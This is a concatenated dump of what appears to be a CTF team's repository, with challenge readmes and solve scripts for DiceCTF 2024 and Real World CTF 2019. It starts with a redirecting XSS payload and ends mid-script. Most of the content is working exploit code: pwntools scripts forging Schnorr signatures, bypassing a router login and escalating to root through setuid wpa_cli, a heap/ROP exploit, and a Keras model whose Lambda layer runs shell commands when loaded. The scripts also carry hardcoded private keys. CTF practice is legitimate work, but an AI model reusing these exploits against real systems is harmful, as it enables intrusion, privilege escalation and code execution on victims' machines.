48 | 
49 | final = '<style onload=location="//a.bbbb.cc">'
50 | 
51 | history = bytearray([1, 7, 7, 6, 13, 101, 157, 181, 197, 199, 1, 1])
52 | code = '?code=' + base64.b64encode(history).decode('utf-8') + ';' + final
53 | print('https://ddg.mc.ax/' + code)
54 | 


--------------------------------------------------------------------------------
/dicectf24-quals/floordrop/solve.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import gmpy2
 3 | 
 4 | MODULUS = 2**44497-1
 5 | 
 6 | def sloth_root(x, p):
 7 |     exponent = (p + 1) // 4
 8 |     x = gmpy2.powmod(x, exponent, p)
 9 |     return int(x)
10 | 
11 | def solve_challenge(x):
12 |     y = sloth_root(x, MODULUS)
13 |     return y
14 | 
15 | def main():
16 |     chal = int(sys.argv[1])
17 |     sol = solve_challenge(chal)
18 |     print(sol.to_bytes((sol.bit_length() + 7) // 8, 'big').hex())
19 | 
20 | if __name__ == '__main__':
21 |     main()


--------------------------------------------------------------------------------
/dicectf24-quals/floordrop/x.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | import time
 3 | from web3 import Web3
 4 | from solve import solve_challenge
 5 | 
 6 | # dice{fr0ntrunn1ng_1s_n0t_ju5t_f0r_s4ndw1ch1ng_f8d9f834}
 7 | 
 8 | private_key0 = 'd4390497993b20ceca1f75257592f4c028dceeea24d8086b0352d8e9554841c2'
 9 | address0 = '0x02133A4096E121CD52A19fc90a5d75EB2B8F9F79'
10 | private_key1 = '405513135f7d15095a2dfdee9f3c89fc31450b4cef5b800f1daf614357df781e'
11 | address1 = '0x5D62437aAdabB397A78e81F483068b0D9660fC14'
12 | 
13 | rpc = 'https://floordrop-rpc.hpmv.dev/'
14 | web3 = Web3(Web3.HTTPProvider(rpc))
15 | my_nonce = web3.eth.get_transaction_count(address0)
16 | 
17 | TX = {
18 |     'nonce': my_nonce,
19 |     'value': 0,
20 |     'gas': 2000000,
21 |     'gasPrice': 2000000016,
22 |     'to': address1,
23 |     'chainId': 133713371337
24 | }
25 | 
26 | signed_tx = web3.eth.account.sign_transaction(TX, private_key0)
27 | 
28 | context.log_level = 'DEBUG'
29 | r = remote('mc.ax', 32123)
30 | r.sendline(b'2')
31 | r.recvuntil(b'deployed at ')
32 | contract = r.recvline().strip(b'\n').decode('utf-8')
33 | print(time.ctime())
34 | print(contract)
35 | 
36 | r.recvuntil(b'nonce: ')
37 | nonce = r.recvline().strip(b'\n')
38 | print(nonce)
39 | assert nonce.startswith(b'0x') and len(nonce) == 66
40 | nonce = nonce[2:].decode('utf-8')
41 | 
42 | # r.recvuntil(b'called with: ')
43 | # chall = r.recvline().strip(b'\n')
44 | # print(chall)
45 | 
46 | r.recvuntil(b'Sent setChallenge transaction ')
47 | txhash = r.recvuntil(b';').strip(b';').decode('utf-8')
48 | print(txhash)
49 | tx = web3.eth.get_transaction(bytes.fromhex(txhash[2:]))
50 | print(tx)
51 | assert tx.input.hex()[:10] == '0x26635c72'
52 | chall = int(tx.input.hex()[-64:], 16)
53 | 
54 | print(time.ctime())
55 | tx_hash = web3.eth.send_raw_transaction(signed_tx.rawTransaction)
56 | print(f"Transaction Hash: {tx_hash.hex()}")
57 | print(chall)
58 | 
59 | now = time.time()
60 | sol = solve_challenge(int(chall))
61 | sol = sol.to_bytes((sol.bit_length() + 7) // 8, 'big').hex()
62 | # print(sol)
63 | print(time.time() - now)
64 | 
65 | TX['gasPrice'] = 2000000020
66 | TX['to'] = contract
67 | TX['nonce'] = my_nonce + 1
68 | TX['data'] = '0x4d13029f0000000000000000000000000000000000000000000000000000000000000040' + nonce + \
69 |         '%064x' % (len(sol) // 2) + sol
70 | 
71 | r.recvuntil(b'Sent expireChallenge transaction')
72 | print(time.ctime())
73 | signed_tx = web3.eth.account.sign_transaction(TX, private_key0)
74 | tx_hash = web3.eth.send_raw_transaction(signed_tx.rawTransaction)
75 | print(f"Transaction Hash: {tx_hash.hex()}")
76 | r.interactive()
77 | 


--------------------------------------------------------------------------------
/rwctf19-final/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5lipper/ctf/3112383ad3b0e0941e8e0400dc27f431370bd709/rwctf19-final/.gitkeep


--------------------------------------------------------------------------------
/rwctf19-final/FastStructureCache/FastStructureCache_2dbf4a3a826a007eb78fa6aa9c478ab6.tgz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5lipper/ctf/3112383ad3b0e0941e8e0400dc27f431370bd709/rwctf19-final/FastStructureCache/FastStructureCache_2dbf4a3a826a007eb78fa6aa9c478ab6.tgz


--------------------------------------------------------------------------------
/rwctf19-final/FastStructureCache/readme.txt:
--------------------------------------------------------------------------------
1 | Score: 500
2 | 
3 | We implement a fast cache for JavaScriptCore. However, I don't know if it is correct. To examine it, we apply the implementation to RegExp at first. Hopefully, there will be no bugs. (The challenge is inspired by an exploitation chain we built a few months ago.)
4 | 
5 | Attachment target
6 | 
7 | 


--------------------------------------------------------------------------------
/rwctf19-final/bank2/bank2.py:
--------------------------------------------------------------------------------
 1 | from schnorr import *
 2 | from pwn import *
 3 | import hashlib
 4 | 
 5 | # rwctf{2r0unD_Schn0Rr_1s_N07_5AfE._cHEck_tH3_0ak1aNDl9_p4p3r}
 6 | 
 7 | def prove(prefix):
 8 |     for i in xrange(0x10000):
 9 |         proof = prefix + '%05x' % i
10 |         test = hashlib.sha1(proof).digest()
11 |         # return proof
12 |         if test[-1] == '\0' and test[-2] == '\0':
13 |             return proof
14 | 
15 | # r = remote('127.0.0.1', 20014)
16 | r = remote('172.16.24.100', 20014)
17 | 
18 | prefix = r.recvline().strip().split()[-1]
19 | print prefix
20 | proof = prove(prefix)
21 | print proof
22 | r.send(proof)
23 | 
24 | print r.recvuntil('priority!')
25 | r.sendline('1'.encode('base64').replace('\n', ''))
26 | print r.recvuntil('Protocol..')
27 | print r.recvline()
28 | (Gr, pk) = eval(r.recvline())
29 | print(Gr)
30 | T = to_bytes(G[0], 32) + to_bytes(G[1], 32)
31 | PK = to_bytes(pk[0], 32) + to_bytes(pk[1], 32)
32 | commitment = T + PK
33 | assert len(commitment) == 128
34 | r.sendline(commitment.encode('base64').replace('\n', ''))
35 | c = sha256(bytes_point(G) + 'DEPOSIT')
36 | print('c', c)
37 | s = r.recvline()
38 | print('s', s)
39 | sk = int(s.strip('L\n')) // c
40 | sk -= 1
41 | print('sk', sk)
42 | assert point_mul(G, sk) == pk
43 | r.sendline(('\x01' * 64).encode('base64').replace('\n', ''))
44 | print r.recvuntil('priority!')
45 | 
46 | c = sha256('aaaa')
47 | m = point_add(point_mul(G, (c + 1) * sk % n), point_mul(pk, n - c))
48 | c = sha256(bytes_point(m) + 'WITHDRAW')
49 | assert m == point_add(point_mul(G, (c + 1) * sk % n), point_mul(pk, n - c))
50 | s = (c + 1) * sk % n
51 | c = sha256(bytes_point(point_add(point_mul(G, s), point_mul(pk, n-c))) + 'WITHDRAW')
52 | assert s == (c + 1) * sk % n
53 | 
54 | r.sendline('0'.encode('base64').replace('\n', ''))
55 | r.recvuntil('signature')
56 | xxx = to_bytes(c, 32) + to_bytes(s, 32)
57 | r.sendline(xxx.encode('base64').replace('\n', ''))
58 | 
59 | r.interactive()
60 | 


--------------------------------------------------------------------------------
/rwctf19-final/bank2/bank2_65a02395c12aec6e2f2f8a041149a75f.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5lipper/ctf/3112383ad3b0e0941e8e0400dc27f431370bd709/rwctf19-final/bank2/bank2_65a02395c12aec6e2f2f8a041149a75f.zip


--------------------------------------------------------------------------------
/rwctf19-final/bank2/readme.txt:
--------------------------------------------------------------------------------
 1 | Bank2
 2 | Score: 500
 3 | 
 4 | Our bank has invested in a HUGE security upgrade. Now we are equipped with the latest interactive multi-signature protocol to keep your assets safe. Your satisfaction is our first priority.
 5 | 
 6 | Attachment
 7 | 
 8 | nc 172.16.24.100 20014
 9 | 
10 | 


--------------------------------------------------------------------------------
/rwctf19-final/lock2018/lock2018_3df961bffa49bd0c93243ae8e73372a6.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5lipper/ctf/3112383ad3b0e0941e8e0400dc27f431370bd709/rwctf19-final/lock2018/lock2018_3df961bffa49bd0c93243ae8e73372a6.zip


--------------------------------------------------------------------------------
/rwctf19-final/lock2018/readme.txt:
--------------------------------------------------------------------------------
 1 | Lock2018
 2 | Score: 500
 3 | 
 4 | You are given a COTS (commercial off-the-shelf) lock, running our home-brewed firmware, w/ web management (please login with whatever username, and your team token as password). You are also given some necessary tools including screw driver, debugger, RF transceiver and wires. See the attachment for document and demo code for RF transceiver.
 5 | 
 6 | Please demonstrate opening the door on the stage. (You are not allowed to access the key hole / micro USB port on the stage)
 7 | 
 8 | PS: The voice output of the lock is Chinese only. Here is an incomplete list of their Pin-Yin pronunciation with English translation. If you have any problem understanding Chinese, feel free to ask.
 9 | 
10 |     Yǐ liánjiē: connected
11 |     Mìmǎ zhèngquè: correct password
12 |     Mìmǎ cuòwù: wrong password"
13 | 
14 | Attachment
15 | 
16 | update:
17 | 
18 | Additional Information for Lock Challenges
19 | 
20 | You can find an SPI module (yellow color, 18.1mm * 22.1mm) on the main PCB, labeled as "HJ-WL433-IP1". Since there's no English datasheet available for this module, we would like to provide necessary information here.
21 | 
22 | This is a radio module based on SI4438 transceiver, w/ 26 MHz oscillator.
23 | 
24 | 


--------------------------------------------------------------------------------
/rwctf19-final/lock2019/readme.txt:
--------------------------------------------------------------------------------
1 | Lock2019
2 | Score: 500
3 | 
4 | A new firmware is on the way. Please enjoy lock2018 for now.
5 | 
6 | 


--------------------------------------------------------------------------------
/rwctf19-final/marxjs/MarxJS_08f783d8c2b3e53eab53c21210188177.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5lipper/ctf/3112383ad3b0e0941e8e0400dc27f431370bd709/rwctf19-final/marxjs/MarxJS_08f783d8c2b3e53eab53c21210188177.zip


--------------------------------------------------------------------------------
/rwctf19-final/marxjs/readme.txt:
--------------------------------------------------------------------------------
 1 | Score: 500
 2 | 
 3 | Demo
 4 | 
 5 | Try to access /flag. Docker container will be initialized&restarted before/after your presentation, no restarting service is available for you during the presentation. @@@no bruteforce@@@
 6 | 
 7 | Attachment
 8 | 
 9 | Additional information for the challenge "MarxJS"
10 | Posted on 2019-12-07 13:44:32(+08:00)
11 | 
12 | The challenge is using the 3rd party SMTP service, there is no SMTP service in the intranet of demo environment.
13 | 
14 | 


--------------------------------------------------------------------------------
/rwctf19-final/model_is_program_i/Dockerfile:
--------------------------------------------------------------------------------
 1 | # stable-20191118
 2 | FROM debian@sha256:a1e12f1fc9804eda9b161c0c44d5438601f08f4af7fea1b4c4801d31f84f3635
 3 | RUN apt-get update && apt-get install -y musl-tools
 4 | WORKDIR /build
 5 | ADD readflag.c .
 6 | RUN musl-gcc -s -oreadflag -Os -static readflag.c
 7 | 
 8 | # ------------------------------------------------------------------------------
 9 | 
10 | FROM dc2019f-ai-han-solo-service
11 | ARG FLAG="rwctf{this_is_not_the_flag_on_server}"
12 | ADD app.py /
13 | EXPOSE 1337
14 | 
15 | COPY --from=0 --chown=1337:1337 /build/readflag /
16 | RUN chmod u=srx,g=rx,o=x /readflag
17 | RUN echo "${FLAG}" > /flag && chmod 0400 /flag && chown 1337:1337 /flag
18 | 
19 | USER nobody:nogroup
20 | ENTRYPOINT [ "gunicorn3", "-b", "0.0.0.0:1337", "app:app" ]
21 | 


--------------------------------------------------------------------------------
/rwctf19-final/model_is_program_i/app.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | 
 3 | import subprocess
 4 | import tempfile
 5 | 
 6 | from flask import Flask, request
 7 | 
 8 | app = Flask("model-is-program-1")
 9 | app.config["MAX_CONTENT_LENGTH"] = 30*1024*1024
10 | 
11 | @app.route("/")
12 | def index():
13 |   return '''
14 |   <!DOCTYPE html>
15 |   <html>
16 |   <head>
17 |     <title>Patch Validator</title>
18 |   </head>
19 |   <body>
20 |   <h1>Welcome!</h1>
21 |   <p>We are running a copy of the patch validator for service ai-han-solo of DEF CON 27 CTF.</p>
22 |   <p>This service is designed by hackers, for hackers, it must be safe.</p>
23 | 
24 |   <h2>Upload your patch</h2>
25 |   <form action="/patch" method="POST" enctype="multipart/form-data">
26 |     <input type="file" name="file">
27 |     <input type="submit" value="Upload!">
28 |   </form>
29 |   </body>
30 |   </html>
31 |   '''
32 | 
33 | @app.route("/patch", methods=["POST"])
34 | def patch():
35 |   if "file" not in request.files:
36 |     return "No file selected."
37 |   uf = request.files["file"]
38 |   if not uf.filename:
39 |     return "No file selected."
40 |   with tempfile.NamedTemporaryFile("wb") as tmpf:
41 |     uf.save(tmpf)
42 |     tmpf.flush()
43 |     # check_filetype.sh
44 |     check_result = subprocess.check_output(["/usr/bin/file", tmpf.name])
45 |     if b"Hierarchical Data Format (version 5) data" not in check_result:
46 |       return "PUBLIC: incorrect patch file type. what are you doing?"
47 |     # validate.sh
48 |     try:
49 |       val_result = subprocess.check_output([
50 |           "/usr/bin/python3", "/ai_han_solo.py", "verify-navigation-parameters",
51 |           "-m", tmpf.name, "-d", "/tmp/coordinates", "-n", "1",
52 |       ])
53 |     except subprocess.CalledProcessError as exc:
54 |       return f"({exc.returncode}) {exc.output.decode('utf-8')}"
55 |     return val_result.decode("utf-8")
56 | 


--------------------------------------------------------------------------------
/rwctf19-final/model_is_program_i/build.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash -e
 2 | 
 3 | UPSTREAM_REPO=https://github.com/o-o-overflow/dc2019f-ai-han-solo-public.git
 4 | COMMIT=1f53bb2dee12440b6971f8a9cbf33d3d4214deea
 5 | docker build -t dc2019f-ai-han-solo-service "$UPSTREAM_REPO#$COMMIT:service"
 6 | 
 7 | rm -rf out || true
 8 | mkdir -p out/public
 9 | 
10 | docker build -t model-is-program-1:public .
11 | docker build -t model-is-program-1:prod --build-arg FLAG=$(cat flag) .
12 | docker save model-is-program-1:public -o out/public/image.tar
13 | docker save model-is-program-1:prod | gzip -n > out/prod-image.tar.gz
14 | 
15 | tar --sort=name \
16 |     --owner=0 --group=0 --numeric-owner \
17 |     --mtime="@${SOURCE_DATE_EPOCH}" \
18 |     -cvf out/release.tar \
19 |     build.sh Dockerfile readflag.c app.py out/public
20 | mv out/prod-image.tar.gz out/prod-image.tar.gz.$(sha256sum out/prod-image.tar.gz | awk '{print $1}')
21 | mv out/release.tar out/release.tar.$(sha256sum out/release.tar | awk '{print $1}')
22 | gzip -n out/release.tar.*
23 | 


--------------------------------------------------------------------------------
/rwctf19-final/model_is_program_i/readflag.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | 
 3 | int main(void) {
 4 |   char flag[256] = {0};
 5 |   FILE* fp = fopen("/flag", "r");
 6 |   if (!fp) {
 7 |     perror("fopen");
 8 |     return 1;
 9 |   }
10 |   if (fread(flag, 1, 256, fp) < 0) {
11 |     perror("fread");
12 |     return 1;
13 |   }
14 |   puts(flag);
15 |   fclose(fp);
16 |   return 0;
17 | }
18 | 


--------------------------------------------------------------------------------
/rwctf19-final/model_is_program_i/readme.txt:
--------------------------------------------------------------------------------
 1 | Model IS Program I
 2 | Score: 500
 3 | 
 4 | We are running a copy of the patch validator for service ai-han-solo of DEF CON 27 CTF. This service is designed by hackers, for hackers, it must be safe.
 5 | 
 6 | Service running at 172.16.25.100:1337
 7 | 
 8 | Attachment
 9 | 
10 | 


--------------------------------------------------------------------------------
/rwctf19-final/model_is_program_i/x.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | import keras
 3 | from keras.models import Sequential
 4 | from keras.layers import Dense, Activation, Lambda
 5 | 
 6 | # rwctf{Names_characters_business_events_and_incidents_are_the_products_of_the_authors_imagination_Any_resemblance_to_actual_persons_living_or_dead_or_actual_events_is_purely_coincidental}
 7 | 
 8 | def antirectifier(x):
 9 |     # __import__('os').system('echo hahahahah')
10 |     sys = __import__('sys')
11 |     sys.stdout.write('hahahah\n')
12 |     sys.stderr.write('errrr\n')
13 |     os = __import__('os')
14 |     os.system('/readflag')
15 |     os.system('/readflag >&2')
16 |     return x
17 | 
18 | def antirectifier_output_shape(input_shape):
19 |     shape = list(input_shape)
20 |     shape[-1] *= 2
21 |     return tuple(shape)
22 | 
23 | model = Sequential([
24 |     Dense(32, input_shape=(784,)),
25 |     Activation('relu'),
26 |     Dense(10),
27 |     Activation('softmax'),
28 | ])
29 | 
30 | model.add(Lambda(antirectifier, output_shape=antirectifier_output_shape))
31 | 
32 | model.save('exp.h5')
33 | 
34 | keras.models.load_model('exp.h5')
35 | 
36 | # __import__('IPython').embed()
37 | 


--------------------------------------------------------------------------------
/rwctf19-final/montagy/readme.txt:
--------------------------------------------------------------------------------
 1 | Score: 500
 2 | 
 3 | Background:
 4 | 
 5 | Hi there, my agent said a smart guy ´_>` solved my challenge last year, which successfully caught my attention. | ᐕ)⁾⁾
 6 | 
 7 | But that was just a starter. You won't expect to 'win my heart' with only an appetizer would you?
 8 | 
 9 | This year I'll be serious about the challenge, and the gaming environment will (hopefully ( ‾◡‾)) be more robust and player-friendly.
10 | 
11 | Let me present you the next generation of smart contract proxy - MONica's TAG-based proxY - Montagy!
12 | 
13 | Try solve any of the puzzles and empty the proxy balance.
14 | 
15 | Enjoy!
16 | 
17 | Description:
18 | 
19 |     Web3 http provider to access the private chain (geth): http://172.16.27.100:8090/<md5(YOUR_TEAM_TOKEN)>/
20 | 
21 |     Target contract address: 0xd068fcc44525569fb593189c8f22827cf0f50f3f
22 | 
23 |     Once the balance of the target contract address equals 0, the backend will send the flagdata in a new tx
24 | 
25 | Info:
26 | 
27 |     genesis.json, player-privkey.txt and a sample docker(exactly the same except for flag, for debug only) are provided.
28 | 
29 |     Don't scan port 8090, there's no other api.
30 | 
31 |     Don't scan ports, there's no other open ports related to this challenge.
32 | 
33 | Hint:
34 | 
35 | An identical environment has been deployed on ropsten: https://ropsten.etherscan.io/address/0xd068fcc44525569fb593189c8f22827cf0f50f3f
36 | 
37 | But this is only to help you understand the situation, DON'T INTERACT WITH THIS ADDRESS during the contest.
38 | 
39 | Attachment
40 | 
41 | 
42 | Montagy - Situation Update
43 | Posted on 2019-12-08 08:56:09(+08:00)
44 | 
45 | Right before the end of yesterday, all the Montagy game servers went down. I've restarted all the servers, the chain data should be REMAIN THE SAME, if you observe any further problem, please reach out to the IT support station.
46 | 
47 | BTW, since the block height kept growning before and during the repair last night, I'll provide additional information to keep us in the same page.
48 | 
49 | The block height was around 26650 when the repairment start.
50 | 
51 | 


--------------------------------------------------------------------------------
/rwctf19-final/printer/printer_cab303eb34695411d6b545fa9089402e.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5lipper/ctf/3112383ad3b0e0941e8e0400dc27f431370bd709/rwctf19-final/printer/printer_cab303eb34695411d6b545fa9089402e.zip


--------------------------------------------------------------------------------
/rwctf19-final/printer/readme.txt:
--------------------------------------------------------------------------------
 1 | Printer
 2 | Score: 500
 3 | 
 4 | There is a network printer server running on ubuntu 18.04. Pwn this service and achieve the following steps.
 5 | 
 6 |     spawn a calculator
 7 |     read the file(in txt mode) we have printed
 8 |     print this message hacked by {your_team_name}
 9 | 
10 | You are NOT allowed to access the real printer deivce.
11 | 
12 | Hackers, enjoy it!
13 | 
14 |     ps: you can try at most 3 times in 10 min per demo chance.
15 | 
16 | Attachment
17 | 
18 | 


--------------------------------------------------------------------------------
/rwctf19-final/router2/hehe.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <string.h>
 4 | #include <unistd.h>
 5 | #include <sys/socket.h>
 6 | #include <sys/un.h>
 7 | 
 8 | int main(int argc, char **argv) {
 9 |     printf("hehehe\n");
10 |     const char *path = argc > 1 ? argv[1] : "/tmp/haha";
11 |     unlink(path);
12 |     int s = socket(AF_UNIX, SOCK_DGRAM, 0);
13 |     printf("fd = %d\n", s);
14 |     struct sockaddr_un addr;
15 |     addr.sun_family = AF_UNIX;
16 |     strcpy(addr.sun_path, path);
17 |     if (bind(s, (struct sockaddr *)&addr, sizeof(struct sockaddr_un)) == -1) {
18 |         perror("bind");
19 |         return 1;
20 |     }
21 |     char buf[1024];
22 |     while (1) {
23 |         struct sockaddr_un client = {0};
24 |         int sz = sizeof(client);
25 |         int l = recvfrom(s, &buf, sizeof(buf) - 1, 0, (struct sockaddr *)&client, &sz);
26 |         if (l == -1) {
27 |             perror("recvfrom");
28 |         } else {
29 |             buf[l] = 0;
30 |             printf("received %d: %s\n", l, buf);
31 |             const char *reply = NULL;
32 |             const char *req = NULL;
33 |             if (!memcmp(buf, "ATTACH", 6)) {
34 |                 reply = "OK\n";
35 |                 // req = "CTRL-EVENT-TERMINATING ";
36 |                 req = "AP-ENABLED ";
37 |             } else if (!memcmp(buf, "PING", 4)) {
38 |                 reply = "PONG";
39 |             } else if (!memcmp(buf, "DETACH", 6)) {
40 |                 reply = "OK\n";
41 |             }
42 |             if (reply != NULL && sendto(s, reply, strlen(reply), 0, (struct sockaddr *)&client, sz) == -1) {
43 |                 perror("sendto/reply");
44 |             }
45 |             if (req != NULL && sendto(s, req, strlen(req), 0, (struct sockaddr *)&client, sz) == -1) {
46 |                 perror("sendto/req");
47 |             }
48 |         }
49 |     }
50 |     return 0;
51 | }
52 | 


--------------------------------------------------------------------------------
/rwctf19-final/router2/kkk.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <unistd.h>
 4 | 
 5 | int main() {
 6 |     setgid(0);
 7 |     setuid(0);
 8 |     system("/bin/sh");
 9 | }
10 | 


--------------------------------------------------------------------------------
/rwctf19-final/router2/mmm.py:
--------------------------------------------------------------------------------
 1 | from flask import Flask
 2 | from flask import render_template,request,redirect
 3 |  
 4 | app = Flask(__name__)
 5 |  
 6 | @app.route('/')
 7 | def test():
 8 |     return '''
 9 | <script>
10 |     alert("pwned by slipper");
11 |     setTimeout(function() {
12 |         location.href = 'https://douyu.com/exploit'
13 |     }, 3000)
14 | </script>
15 | <h3>pwned by slipper??</h3>'''
16 | 
17 | if __name__ == '__main__':
18 |     app.run(debug=False, port=80, host='0.0.0.0')
19 | 


--------------------------------------------------------------------------------
/rwctf19-final/router2/openwrt_f0af8498f64862fce70f432b702daec5.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5lipper/ctf/3112383ad3b0e0941e8e0400dc27f431370bd709/rwctf19-final/router2/openwrt_f0af8498f64862fce70f432b702daec5.bin


--------------------------------------------------------------------------------
/rwctf19-final/router2/readme.txt:
--------------------------------------------------------------------------------
 1 | Score: 500
 2 | 
 3 | Demo
 4 | 
 5 | The router challenge has returned this year. You can find the target device at your table.
 6 | 
 7 | The router has a low permission user pwn with default password rwctf, which is unchanged and you can access it via ssh.
 8 | 
 9 | For debugging purpose, root password in your device is empty. We will change root password and /etc/account1 file in the device for demo.
10 | 
11 | Demonstration requirements:
12 | 
13 |     Attack from LAN
14 |     Get root shell of the router and show it
15 |     Hijack the domain realworldctf.com to a webpage saying hacked by <your team name>
16 | 
17 | hint: The firmware is built on top of OpenWRT with customization: )
18 | 
19 | NOTE: Before you go on the stage, please make sure your debug information will not appear on the screen in case other teams see it.
20 | 
21 | Attachment
22 | 
23 | 


--------------------------------------------------------------------------------
/rwctf19-final/router2/solution.txt:
--------------------------------------------------------------------------------
 1 | login shell of user `pwn` is changed to `/bin/dsh`. x.py exploits an oob
 2 | write bug to bypass the authentication and changes default login shell to
 3 | `/bin/ash`. After that we are able to login in ssh and copy more payloads
 4 | for next step.
 5 | 
 6 | `/usr/sbin/wpa_cli` has setuid bit enabled and it's owned by root. wpa_cli
 7 | accepts a parameter `action script` to handle event from control socket.
 8 | 
 9 | `hehe` (hehe.c) binds a unix socket at /tmp/haha and serves as the control
10 | socket provider. Run `wpa_cli -g /tmp/haha -a /tmp/lol` then `lol` will be
11 | executed with euid=0.
12 | 
13 | Since /tmp/ is mount as nosuid, we have to modify existing binaries on the
14 | router. In `lol` we have add setuid bit to /bin/ash. Login as `pwn` again
15 | we will have euid/egid=0.
16 | 
17 | The demo requires hijacking realworldctf.com to our own website. We need to
18 | run setuid&&setgid to becomre real root in order to edit /etc/hosts.
19 | 
20 | 


--------------------------------------------------------------------------------
/rwctf19-final/router2/x.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | import hashlib
 3 | 
 4 | s = ssh(user='pwn', host='192.168.1.1', password='rwctf')
 5 | r = s.shell()
 6 | # r = process(['qemu-mipsel', '-g', '1234', './dsh'])
 7 | # r = process(['qemu-mipsel', './dsh'])
 8 | 
 9 | r.recvuntil('(dsh)')
10 | r.sendline('help')
11 | r.recvuntil('Qrcode')
12 | r.recvuntil('#')
13 | 
14 | r.sendline('shell')
15 | r.recvuntil('Accounts')
16 | r.sendline('1')
17 | r.recvuntil('codes :')
18 | r.sendline('x' * 0x21)
19 | r.recvuntil('#')
20 | 
21 | pwd = hashlib.md5('g' * 0x29).hexdigest()
22 | print(pwd)
23 | r.sendline('shell ' + ('aaaaaaaaaaaaaaaa ' * 6) + ' ' + 'g' * 0x40 + ' hhhh xxxx')
24 | r.recvuntil('Accounts')
25 | r.sendline('1')
26 | r.recvuntil('codes :')
27 | r.sendline(hashlib.md5('g' * 0x29).hexdigest() + '\x00')
28 | 
29 | # r.recvuntil('#')
30 | # r.sendline('diagnose')
31 | r.sendline('\n\nchsh -s /bin/ash')
32 | 
33 | r.interactive()
34 | r.close()
35 | 


--------------------------------------------------------------------------------
/rwctf19-final/safari/readme.txt:
--------------------------------------------------------------------------------
1 | Safari
2 | Score: 500
3 | 
4 | This challenge is based on an exploitation chain we built a few months ago. We revert apple's patch to revive the bug. Hopefully, it can give you some insights into browser research.
5 | 
6 | The VM Image
7 | 
8 | update: we've uploaded the attachment to dropbox for downloading: https://www.dropbox.com/s/0xlhgquztdqdtwp/macOS_VM.7z?dl=0
9 | 


--------------------------------------------------------------------------------
/rwctf19-quals/across_the_great_wall.py:
--------------------------------------------------------------------------------
  1 | from pwn import *
  2 | import os, time, random, hashlib, threading
  3 | from Crypto.Cipher import AES
  4 | 
  5 | # rwctf{Across_the_Great_Wall_we_can_reach_every_corner_in_the_world_228f6bec172c}
  6 | 
  7 | password = "meiyoumima"
  8 | 
  9 | r = remote('54.153.22.136', 3343)
 10 | host = '54.153.22.136'
 11 | ip = '149.28.204.92'
 12 | 
 13 | r.recvuntil('bind at ')
 14 | port = int(r.recvline().strip())
 15 | 
 16 | MAX_CONN = 5
 17 | conn = [remote(host, port) for _ in xrange(MAX_CONN)]
 18 | 
 19 | def pack(data, rand):
 20 |     timestamp = p64(int(time.time()))
 21 |     nonce = p64(random.random() * 1000)
 22 |     token = hashlib.sha256(password + timestamp + nonce).digest()[:16]
 23 |     kv = hashlib.sha256(password + token).digest()
 24 |     cipher = AES.new(key=kv[:16], IV=kv[16:], mode=AES.MODE_CBC)
 25 |     meta = timestamp + nonce + p8(1) + p32((len(data) + len(rand) + 80) & 0xffffffff) + p8(len(rand)) + '\x00' * 10
 26 |     checksum = hashlib.sha256(token + meta + '\x00' * 32 + str(data) + rand).digest()
 27 |     return token + cipher.encrypt(meta + checksum + str(data)) + rand
 28 | 
 29 | def packx():
 30 |     timestamp = p64(int(time.time()))
 31 |     nonce = p64(random.random() * 1000)
 32 |     token = hashlib.sha256(password + timestamp + nonce).digest()[:16]
 33 |     kv = hashlib.sha256(password + token).digest()
 34 |     cipher = AES.new(key=kv[:16], IV=kv[16:], mode=AES.MODE_CBC)
 35 |     return token + cipher.encrypt(timestamp + nonce + p8(1) + p32(79) + p8(0) +
 36 |             '\x00' * 10 + '\x00' * 32)
 37 | 
 38 | leak = '\x01\x01\x03' + p8(len(ip)) + ip + p16(54321)[::-1]
 39 | leak = leak.ljust(0x1e0 - 1) + '\x80'
 40 | 
 41 | leaked = []
 42 | 
 43 | def listener():
 44 |     l = listen(54321)
 45 |     _ = l.wait_for_connection()
 46 |     d = l.recvuntil(chr(0x80))
 47 |     d = l.recvn(0x80)
 48 |     leaked.append(d)
 49 | 
 50 | th = threading.Thread(target=listener)
 51 | th.start()
 52 | 
 53 | dead = [MAX_CONN - 2 - i for i in xrange(2)]
 54 | for x in dead:
 55 |     conn[x].close()
 56 | 
 57 | conn[0].send(pack(leak, ''))
 58 | 
 59 | th.join()
 60 | d = leaked[0]
 61 | text_base = u64(d[0x30:0x38]) - 0x39793
 62 | heap_base = u64(d[0x10:0x18]) - 0x9cc30
 63 | magic = text_base + 0xA1C1
 64 | 
 65 | text_base = u64(d[0x30:0x38]) - 0x396d1
 66 | heap_base = u64(d[0x10:0x18]) - 0x1b0f0
 67 | enc_data = heap_base + 0x1ee10
 68 | rax = enc_data + 0xb20
 69 | magic = text_base + 0xA0FF
 70 | print 'text: %#x' % (text_base)
 71 | print 'heap: %#x' % (heap_base)
 72 | print hexdump(d)
 73 | 
 74 | conn[1].send(packx())
 75 | prev = enc_data + 0x40
 76 | io = enc_data + 0x80
 77 | io2 = enc_data + 0x100
 78 | buf = enc_data + 0x140
 79 | rop = enc_data + 0x200
 80 | rop -= 0xa80
 81 | rop2 = enc_data + 0x400
 82 | payload = bytearray('A' * 0xb20)
 83 | payload[:8] = p64(magic)
 84 | payload[0x48:0x50] = p64(1) # prev->closed
 85 | payload[0x88:0x8c] = p32(1) # fd = 1
 86 | payload[0x8c] = 0 # not closed
 87 | payload[0x90:0x94] = p32(0x1001)
 88 | payload[0x98:0xa0] = p64(buf)
 89 | payload[0x140:0x148] = p64(rop)
 90 | payload[0x148:0x150] = p64(rop + 0x1001)
 91 | payload[0x108:0x10c] = p32(0) # fd = 0
 92 | payload[0x10c] = 0 # not closed
 93 | payload[0x110:0x114] = p32(0)
